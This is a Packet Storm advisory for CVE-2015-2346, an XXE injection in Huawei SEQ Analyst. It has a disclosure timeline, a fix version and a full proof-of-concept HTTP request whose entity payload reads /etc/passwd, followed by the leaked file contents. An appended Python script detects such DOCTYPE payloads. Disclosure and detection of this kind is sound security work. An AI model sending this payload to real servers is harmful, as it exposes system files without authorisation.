packetstorm | Ugur Cihan KOC | PACKETSTORM:131459
History: Apr 16, 2015 - 12:00 a.m.

Huawei SEQ Analyst XXE Injection


EPSS: 0.002 (Low), percentile 52.5%

`#Document Title:  
============  
Huawei SEQ Analyst - XML External Entity Injection (XXE)  
  
#Release Date:  
===========  
15 Apr 2015  
  
#CVE-ID:  
=======  
CVE-2015-2346  
  
#Product & Service Introduction:  
=======================  
SEQ Analyst is a platform for business quality monitoring and management by  
individual users and multiple vendors in a quasi-real-time and retraceable  
manner.  
More details and manual:  
http://download.huawei.com/download/filedownload.do?modelID=bulletin&refID=IN0000056669,101  
  
#Vulnerability Disclosure Timeline:  
========================  
3 Mar 2015 Bug reported to the vendor.  
6 Mar 2015 Vendor responded; investigating.  
16 Mar 2015 Asked about the case.  
16 Mar 2015 Vendor has validated the issue.  
17 Mar 2015 There isn't any fix for the issue.  
18 Mar 2015 CVE number assigned  
15 Apr 2015 Fixed  
  
#Affected Product(s):  
===============  
Huawei Technologies Co. Ltd.  
Product: Huawei SEQ Analyst V200R002C03LG0001SPC100 (other versions may be  
vulnerable)  
  
#Exploitation Technique:  
=================  
Local, Authenticated  
  
#Technical Details:  
========================  
Target Path: /monitor/flexdata.action  
Sample Payload: <!DOCTYPE foo [<!ENTITY xxe00c70 SYSTEM "file:///etc/passwd"> ]>  
Affected Parameter: req  
  
#Proof of Concept (PoC):  
==================  
https://drive.google.com/file/d/0B-LWHbwdK3P9YnVvYXFFZWZKc0k/view?usp=sharing  
  
Request:  
  
POST /monitor/flexdata.action HTTP/1.1  
Host: ***:8443  
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:36.0) Gecko/20100101 Firefox/36.0  
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8  
Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3  
Accept-Encoding: gzip, deflate  
DNT: 1  
Cookie: JSESSIONID=C07AC243148F4C6F7677E90C1085C2D3; org.springframework.web.servlet.i18n.CookieLocaleResolver.LOCALE=en_US; locale=en_US; locked=false; timeNum=1425365144829; timeState=true; loginUserName=testsms; CASTGC=TGT-549-skiUgOJowwMXhTwxQ4bH1iHB2XKWmKcJVLJYIlthZ56kqJ9yAZ-cas; lockScreen=false  
Connection: keep-alive  
Referer: https://***:8443/monitor/flexrelease/AllNetMonitor.swf/[[DYNAMIC]]/5  
Content-type: application/x-www-form-urlencoded  
Content-Length: 136  
  
req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<command>bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B0200%202015  
  
Response:  
  
HTTP/1.1 200 OK  
Date: Tue, 03 Mar 2015 06:46:29 GMT  
Server: Apache-Coyote/1.1  
Cache-Control: no-cache, no-store  
Content-Type: text/html;charset=utf-8  
Content-Language: en-US  
Vary: Accept-Encoding  
Keep-Alive: timeout=5, max=100  
Connection: Keep-Alive  
Content-Length: 4281  
  
<html>  
<head>  
<style type="text/css">  
…  
<tr class="row_even">  
<td class="cell_object">1</td>  
<td class="cell_object">2、Command is  
bizLicenseSettingnobody:x:65534:65533:nobody:/var/lib/nobody:/bin/false  
bin:x:1:1:bin:/bin:/bin/false  
daemon:x:2:2:Daemon:/sbin:/bin/false  
ftp:x:40:49:FTP account:/srv/ftp:/bin/false  
root:x:0:0:root:/root:/bin/bash  
messagebus:x:103:101:User for D-Bus:/var/run/dbus:/bin/false  
ntp:x:74:102:NTP daemon:/var/lib/ntp:/bin/false  
ftpsecure:x:104:65534:Secure FTP User:/var/lib/empty:/bin/false  
polkituser:x:105:103:PolicyKit:/var/run/PolicyKit:/bin/false  
haldaemon:x:106:104:User for haldaemon:/var/run/hald:/bin/false  
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false  
webserver:x:360:1800::/home/webserver:/bin/bash  
ecmftp:x:1000:1800::/opt/pub/software:/bin/bash  
ftptest:x:1001:1800::/opt/webserver/workspaces/ftp:/bin/bash  
httpd:x:361:1801::/home/httpd:/bin/bash  
cognos:x:1002:1802::/home/cognos:/bin/bash  
ftptrace:x:1003:1800::/opt/webserver/workspaces/ftp/traceserver:/bin/bash  
ftpsoc:x:1004:1800::/opt/pub/software:/bin/bash  
ftprtmu:x:1005:1800::/opt/webserver/workspaces/ftp/rtmu:/bin/bash</td>  
</tr>  
<tr class="row_odd">  
...  
  
#Solution Fix & Patch:  
================  
15 Apr 2015 Fixed version --> SEQ Analyst V200R002C03LG0001CP0022  
  
#Credits & Authors:  
==============  
Ugur Cihan Koc  
@_uceka_  
www.uceka.com  
  
  
`
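
A check for the request pattern shown in the PoC, as an added example that is not part of the advisory and not Huawei's code: it form-decodes a request body, parses each `req` value with expat's declaration handlers (no entity is ever resolved), and reports any DOCTYPE or external entity declaration. The function names, finding labels and the benign sample are assumptions made for this example; the flagged sample is the PoC request body above.

```python
from urllib.parse import parse_qs
from xml.parsers import expat


def dtd_findings(xml_text):
    """Parse xml_text with expat and list DTD declarations; nothing is fetched."""
    findings = []

    def on_doctype(name, system_id, public_id, has_internal_subset):
        findings.append(f"doctype:{name}")

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # value is None for external entities; system_id carries the URI.
        if system_id is not None or public_id is not None:
            kind = "external-parameter-entity" if is_param else "external-entity"
            findings.append(f"{kind}:{name}={system_id}")

    parser = expat.ParserCreate()
    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    # No ExternalEntityRefHandler is set, so expat skips &name; references
    # to external entities instead of loading them.
    try:
        parser.Parse(xml_text, True)
    except expat.ExpatError:
        findings.append("malformed-xml")
    return findings


def inspect_form_body(body, field="req"):
    """Decode an x-www-form-urlencoded body and inspect every `field` value."""
    findings = []
    for value in parse_qs(body, keep_blank_values=True).get(field, []):
        findings.extend(dtd_findings(value))
    return findings


# Request body from the PoC in this advisory (line wraps rejoined).
POC_BODY = (
    'req=<!DOCTYPE%20foo%20[<!ENTITY%20xxe00c70%20SYSTEM%20'
    '"file%3a%2f%2f%2fetc%2fpasswd">%20]><Req>%0a%20%20<command>'
    'bizLicenseSetting%26xxe00c70%3b<%2fcommand>%0a<%2fReq>'
    '&rdm=Tue%20Mar%203%2008%3A45%3A50%20GMT%2B0200%202015'
)
# Constructed benign request with the same shape and no DOCTYPE.
BENIGN_BODY = "req=%3CReq%3E%3Ccommand%3EbizLicenseSetting%3C%2Fcommand%3E%3C%2FReq%3E&rdm=1"

if __name__ == "__main__":
    print(inspect_form_body(POC_BODY))
    print(inspect_form_body(BENIGN_BODY))
```

Because the value is parsed rather than pattern-matched, variations in whitespace or encoding of the DOCTYPE do not change the result; any non-empty finding list on this endpoint is worth an alert or a rejection.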
